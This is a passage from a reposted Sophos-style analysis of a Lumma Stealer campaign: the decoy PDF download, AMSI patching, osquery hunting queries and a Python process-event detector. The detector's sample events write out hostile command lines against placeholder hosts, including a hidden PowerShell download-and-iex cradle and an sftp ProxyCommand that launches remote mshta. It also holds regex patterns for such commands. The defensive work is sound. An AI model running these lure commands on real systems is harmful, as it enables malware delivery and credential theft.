This method downloads the content of the URL passed to it using WebClient.<br \/>The script passes the value of the \u2018O\u2019 variable (containing the C2 URL) to the PE loaded in memory.<\/li>\n<li>The \u2018aHdiNKuWlR\u2019 method defined in the PE processes the URL passed to it by downloading its content using DownloadString.<\/li>\n<li>The \u2018appdata\\roaming\u2019 path is saved to the variable \u2018Ikmg\u2019.<\/li>\n<li>Function \u2018bOje\u2019 is executed and performs the following actions:\n<ol>\n<li>The function first appends \u2018i1040gi.pdf\u2019 to the \u2018Ikmg\u2019 (file path) variable.<\/li>\n<li>It calls function \u2018rlYDr\u2019 and passes a unique identifier, which is retrieved from the AES-decrypted data at position 103 with length 86, as shown in Figure 15.<\/li>\n<\/ol>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig15.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960869\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig15.png\" alt=\"Hex code showing the unique identifier\" width=\"640\" height=\"240\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig15.png 1280w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig15.png?resize=300,113 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig15.png?resize=768,288 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig15.png?resize=1024,384 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><br \/><em>Figure 15: A hexadecimal view of the unique identifier<\/em><\/p>\n<\/li>\n<li>Checks whether the \u2018appdata\\roaming\\i1040gi.pdf\u2019 path already exists (so the decoy is only fetched once).<\/li>\n<li>If the file path doesn&#8217;t exist, executes function \u2018XSFbo\u2019. 
This function takes two parameters:\n<ol>\n<li>\u2018BtPdn\u2019: This function takes the unique identifier as input. It extracts a specific 100 characters from the AES-decrypted data and uses them as a lookup table to convert the unique identifier into a URL. The resulting URL is a legitimate PDF document from the IRS, a decoy that gives the victim the document they expected while the real payload continues in the background.<\/li>\n<li>The second parameter is the file path in variable \u2018EVcD\u2019, as shown in Figure 16.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig16.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960870\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig16.png\" alt=\"The highly obfuscated filepath\" width=\"640\" height=\"307\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig16.png 1052w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig16.png?resize=300,144 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig16.png?resize=768,369 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig16.png?resize=1024,492 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 16: The file path appears<\/em><\/p>\n<p>After decoding the URL, function \u2018XSFbo\u2019 downloads its contents using \u2018Net.WebClient\u2019 (a class name that was itself decoded with \u2018BtPdn\u2019), then saves the PDF to the file path specified in variable \u2018EVcD\u2019, as shown in Figure 17.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig17.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960871\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig17.png\" alt=\"Another view of the filepath\" width=\"640\" height=\"65\" 
srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig17.png 1174w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig17.png?resize=300,31 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig17.png?resize=768,79 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig17.png?resize=1024,105 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 17: The file path appears again, as the save destination<\/em><\/p>\n<p>Finally, the PDF that was downloaded is opened, as shown in Figures 18 and 19.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig18.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960872\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig18.png\" alt=\"Another obfuscated view, this time of the execution instruction\" width=\"618\" height=\"120\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig18.png 618w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig18.png?resize=300,58 300w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\"\/><\/a><\/p>\n<p><em>Figure 18: There it is\u2026<\/em><\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig19.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960873\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig19.png\" alt=\"The code executes\" width=\"640\" height=\"73\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig19.png 1280w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig19.png?resize=300,34 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig19.png?resize=768,88 768w, 
https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig19.png?resize=1024,117 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 19: \u2026and there it goes<\/em><\/p>\n<h3><strong>But wait! There\u2019s more!<\/strong><\/h3>\n<p>To conclude this analysis, let\u2019s trace back to the stages before the benign PDF is downloaded and opened.<\/p>\n<p>We first noticed that there was a dynamic retrieval of the \u2018Load\u2019 method, which was used to load the embedded PE that we decoded. Then we saw a static method defined inside the PE that was being leveraged to download the next stage. Finally, we saw the downloaded script executed with \u2018InvokeScript\u2019. Let\u2019s focus on this next stage.<\/p>\n<p>The next stage that was downloaded is heavily obfuscated with useless comments and very long variable names, as shown in Figure 20.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig20.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960874\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig20.png\" alt=\"A large block of obfuscation with many amusing words, mainly concerning snacks\" width=\"640\" height=\"240\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig20.png 1280w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig20.png?resize=300,113 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig20.png?resize=768,288 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig20.png?resize=1024,384 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 20: Mooncake, pasties, fritter, ragu, kebabs, taco\u2026 clearly someone was obfuscating on an empty stomach<\/em><\/p>\n<p>Once de-obfuscated, we discovered that 
this script is responsible for downloading a final stage. The script features dynamic resolution of low-level Windows APIs such as \u2018GetProcAddress\u2019, \u2018VirtualProtect\u2019, and \u2018AmsiInitialize\u2019, the combination typically used to patch AMSI in the PowerShell process\u2019s memory so that the final stage can be loaded without being scanned.<\/p>\n<h2><strong>Detections<\/strong><\/h2>\n<p>The following Sophos Live Discover (osquery) queries may prove useful for defenders seeking evidence of Lumma Stealer on their systems. Each takes the Sophos process IDs (SPIDs) of the processes already identified as part of the chain; substitute them for the placeholders.<\/p>\n<p>Identify all files (scripts and binaries) created or deleted by those SPIDs within the last eight hours, or within a fixed time range:<\/p>\n<pre>SELECT\nstrftime('%Y-%m-%d %H:%M:%S', datetime(sfj.time,'unixepoch')) dateTime, sfj.time AS epoch_time, spj.cmd_line, CASE sfj.event_type\n    WHEN 0 THEN 'Created'\n    WHEN 2 THEN 'Deleted'\n  END eventType, sfj.sophos_pid, sfj.path AS file_path, sfj.target_path, sfj.file_size, strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.creation_time,'unixepoch')) birth_time_utc, strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.last_write_time,'unixepoch')) modified_time_utc, spj.sid, u.username, sfj.sha256\nFROM sophos_file_journal sfj\nLEFT JOIN sophos_process_journal spj ON sfj.sophos_pid = spj.sophos_pid\nLEFT JOIN users u ON spj.sid = u.uuid\nWHERE\nsfj.sophos_pid IN ('&lt;spid1&gt;', '&lt;spid2&gt;', '&lt;spid3&gt;', '&lt;spid4&gt;')\nAND\nsfj.event_type IN (0, 2)\nAND\nsfj.time &gt; strftime('%s', 'now', '-8 hour')\n-- or, for a fixed window:\n--sfj.time &gt; strftime('%s','2024-11-13 04:44:32') AND sfj.time &lt; strftime('%s','2024-11-13 04:47:35')<\/pre>\n<p>Identify possible exfiltration and C2:<\/p>\n<pre>SELECT\nstrftime('%Y-%m-%d %H:%M:%S', datetime(time,'unixepoch')) dateTime, *\nFROM sophos_process_activity\nWHERE sophos_pid IN ('&lt;spid1&gt;', '&lt;spid2&gt;', '&lt;spid3&gt;', '&lt;spid4&gt;')\nAND subject IN ('Dns','FileOtherReads', 'Ip', 'RuntimeIOCs', 'Process', 
'Network')\nAND time &gt; strftime('%s', 'now', '-8 hour')\n--AND time &gt; strftime('%s','2024-11-13 04:44:32') AND time &lt; strftime('%s','2024-11-13 04:47:35')<\/pre>\n<p>Locate the browser history databases, which can then be collected and inspected for the source URL of the fake CAPTCHA \/ verification prompt (the query finds the files; it does not read the URLs out of them):<\/p>\n<pre>SELECT f.path, f.directory, f.filename, f.size, strftime('%Y-%m-%d %H:%M:%S',datetime(f.mtime,'unixepoch')) AS modified_time_utc, strftime('%Y-%m-%d %H:%M:%S',datetime(f.atime,'unixepoch')) AS last_access_time_utc, strftime('%Y-%m-%d %H:%M:%S',datetime(f.ctime,'unixepoch')) AS change_time_utc, strftime('%Y-%m-%d %H:%M:%S',datetime(f.btime,'unixepoch')) AS birth_time_utc, f.attributes, h.sha256 AS SHA256, h.sha1 AS SHA1, h.md5 AS MD5\nFROM file f LEFT JOIN hash h ON f.path = h.path\nWHERE f.path LIKE 'C:\\Users\\%\\AppData\\Local\\Google\\Chrome\\User Data\\%\\History' -- Windows history for Chrome\nOR f.path LIKE 'C:\\Users\\%\\AppData\\Local\\Microsoft\\Edge\\User Data\\%\\History' -- history for Edge\nOR f.path LIKE 'C:\\Users\\%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\%\\places.sqlite' -- history (and, in current versions, downloads) for Firefox\nOR f.path LIKE 'C:\\Users\\%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\%\\downloads.sqlite' -- downloads for legacy Firefox profiles\nORDER BY f.mtime DESC<\/pre>\n<h2><strong>Conclusion<\/strong><\/h2>\n<p>Lumma Stealer remains a significant threat as of this writing. The documented tactic of using fake CAPTCHA sites to lull victims into entering a malicious command on their own systems is an ugly twist on the situation; Sophos\u2019 endpoint protection counters the threat with a range of malware detections and behavioral-analysis tactics, but educating users to distrust CAPTCHAs, after so many years of convincing them to answer them, is a heavy lift. 
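<\/p>
<p>The Live Discover queries above pivot on process IDs an analyst already has; the behavioural pattern itself can also be scored from ordinary process-creation telemetry. The Python below is an added example, not Sophos detection logic and not tied to any product: given parent image, child image and command line, it flags the traits the two delivery chains in this post share, namely PowerShell launched from explorer.exe with a hidden window, a download cradle and Invoke-Expression; an OpenSSH client handed a ProxyCommand that runs a shell; mshta.exe pointed at a remote URL; and the single-character -replace padding trick. The sample events are constructed, with placeholder hosts and paths, to mirror the two chains plus three benign launches that must not fire.<\/p>

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record: parent image, child image, full command line."""
    parent: str
    image: str
    cmdline: str


PS_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
SSH_IMAGES = {"ssh.exe", "sftp.exe", "scp.exe"}

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
CRADLE = re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient|"
                    r"downloadstring|downloadfile|\bcurl\b|\bwget\b", re.I)
EVAL = re.compile(r"invoke-expression|\biex\b", re.I)
ENCODED = re.compile(r"-e[a-z]{0,13}\s+[A-Za-z0-9+/=]{20,}", re.I)      # -e / -enc / -EncodedCommand <b64>
PROXYCMD = re.compile(r"proxycommand\s*=", re.I)
SHELL_IN_PROXY = re.compile(r"powershell|pwsh|\bcmd\b|mshta|wscript|cscript", re.I)
REMOTE_HTA = re.compile(r"mshta(?:\.exe)?\s+[\"']?https?://", re.I)
REPLACE_PAD = re.compile(r"-[ic]?replace\s*'[^']{1,3}'", re.I)          # strip-a-padding-char trick


def _name(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyse(ev: ProcEvent) -> list:
    """Return the suspicious traits of one event; an empty list means nothing fired."""
    img, par, cl = _name(ev.image), _name(ev.parent), ev.cmdline
    reasons = []
    if img in PS_IMAGES:
        for tag, rx in (("hidden_window", HIDDEN), ("download_cradle", CRADLE),
                        ("invoke_expression", EVAL), ("encoded_command", ENCODED)):
            if rx.search(cl):
                reasons.append(tag)
        if reasons and par == "explorer.exe":        # Run dialog / pasted-lure parent
            reasons.append("launched_from_explorer")
        if par in SSH_IMAGES:
            reasons.append("spawned_by_openssh_client")
    if img in SSH_IMAGES and PROXYCMD.search(cl):
        reasons.append("openssh_proxycommand")
        if SHELL_IN_PROXY.search(cl):
            reasons.append("proxycommand_runs_shell")
    if REMOTE_HTA.search(cl):
        reasons.append("mshta_remote_url")
    if REPLACE_PAD.search(cl):
        reasons.append("replace_padding_obfuscation")
    return reasons


def triage(events) -> list:
    """Events worth an analyst's attention, in input order, with their reasons."""
    return [{"index": i, "image": _name(ev.image), "reasons": r}
            for i, ev in enumerate(events) if (r := analyse(ev))]


# Constructed events modelled on the two chains above; hosts and paths are placeholders.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SFTP = "C:\\Windows\\System32\\OpenSSH\\sftp.exe"
LURE = "('m]]sh]]ta h]]ttps://lure.example.test/a.mp4' -replace ']')"
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\explorer.exe", PS,
              "powershell.exe -W Hidden -command $uR='https://cdn.example.test/new-artist.txt'; "
              "$reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t"),
    ProcEvent("C:\\Windows\\explorer.exe", SFTP,
              f"sftp.exe -o ProxyCommand=\"powershell powershell -Command {LURE}\""),
    ProcEvent(SFTP, "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
              f"ssh.exe -oForwardX11 no -o \"ProxyCommand=powershell powershell -Command {LURE}\" -s -- . sftp ."),
    ProcEvent(PS, "C:\\Windows\\System32\\mshta.exe", "mshta.exe https://lure.example.test/a.mp4"),
    ProcEvent("C:\\Windows\\explorer.exe", PS, "powershell.exe"),                       # user opened a console
    ProcEvent("C:\\Windows\\System32\\svchost.exe", PS,
              "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"),  # scheduled task
    ProcEvent("C:\\Windows\\System32\\cmd.exe", SFTP,
              "sftp.exe -i C:\\Users\\alice\\.ssh\\id_ed25519 alice@files.example.test"),   # genuine sftp use
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

<p>Only the first four sample events fire: the pasted command trips the hidden-window, cradle and Invoke-Expression checks under an explorer.exe parent; both OpenSSH launches trip the ProxyCommand and padding checks; and the mshta launch trips the remote-URL check. The explorer.exe parent is deliberately only a modifier, never a reason on its own, because that is also how every interactive PowerShell console starts.<\/p>
<p>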
As these education efforts grow, defenders are advised to institute appropriate endpoint-detection technology and to remember that the tactics of this all-too-common infostealer continue to evolve.<\/p>\n<h3><strong>Acknowledgements<\/strong><\/h3>\n<p>Andrew Jaeger, Nayana V R, David Whitehall, and Waldemar Stiefvater contributed review and constructive critique to this work.<\/p>\n<h3><strong>Indicators of compromise<\/strong><\/h3>\n<p>The IoCs compiled in this investigation are <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/2025%20Lumma%20Stealer.csv\">available<\/a> on our GitHub repository.<\/p>\n<\/p><\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>In September 2024, a threat hunt across Sophos Managed Detection and Response\u2019s telemetry uncovered a Lumma Stealer campaign using fake CAPTCHA sites that instructed victims to paste a (malicious) PowerShell-encoded command into Windows\u2019 command-line interface. Subsequent investigations allowed us to dig deeply into the mechanics of the notorious info stealer. 
This post recounts [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2295,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[2257,2255,121,120,2256],"class_list":["post-2293","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-coming","tag-lumma","tag-news","tag-sophos","tag-stealer"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/2293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2293"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/2293\/revisions"}],"predecessor-version":[{"id":2294,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/2293\/revisions\/2294"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/2295"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}